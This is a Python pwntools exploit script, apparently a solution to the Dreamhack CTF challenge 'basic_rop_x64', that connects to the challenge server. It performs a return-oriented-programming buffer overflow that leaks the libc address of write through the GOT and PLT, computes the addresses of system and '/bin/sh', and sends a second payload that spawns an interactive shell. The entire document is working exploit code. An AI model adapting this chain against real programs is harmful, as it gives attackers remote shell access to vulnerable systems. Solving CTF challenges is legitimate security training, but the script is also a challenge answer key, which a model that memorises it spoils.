from pwn import *

r = remote("host1.dreamhack.games", 14666)
# r = process("./basic_rop_x86")
e = ELF("./basic_rop_x64")

libc = ELF("./libc.so.6")


pop_rdi_ret = 0x00400883
pop_rsi_r15_ret = 0x00400881
ret = 0x004005a9
main = 0x00000000004007ba

payload  = b""
payload += b"a" * 0x48
payload += p64(ret)

payload += p64(pop_rdi_ret)
payload += p64(1)
payload += p64(pop_rsi_r15_ret)
payload += p64(e.got['write'])
payload += p64(0)
payload += p64(e.plt['write'])
payload += p64(main)

r.sendline(payload)
sleep(0.5)
r.recvuntil("a"*0x40)
libc_base = u64(r.recv()[:8].ljust(8, b"\x00"))
print(hex(libc_base))

libc_system = libc_base + libc.symbols['system'] - libc.symbols['write']
libc_binsh = libc_base + next(libc.search(b"/bin/sh")) - libc.symbols['write']

payload  = b""
payload += b"a" * 0x48
payload += p64(ret)
payload += p64(pop_rdi_ret)
payload += p64(libc_binsh)
payload += p64(libc_system)
sleep(0.5)

r.sendline(payload)
sleep(0.5)

r.interactive()
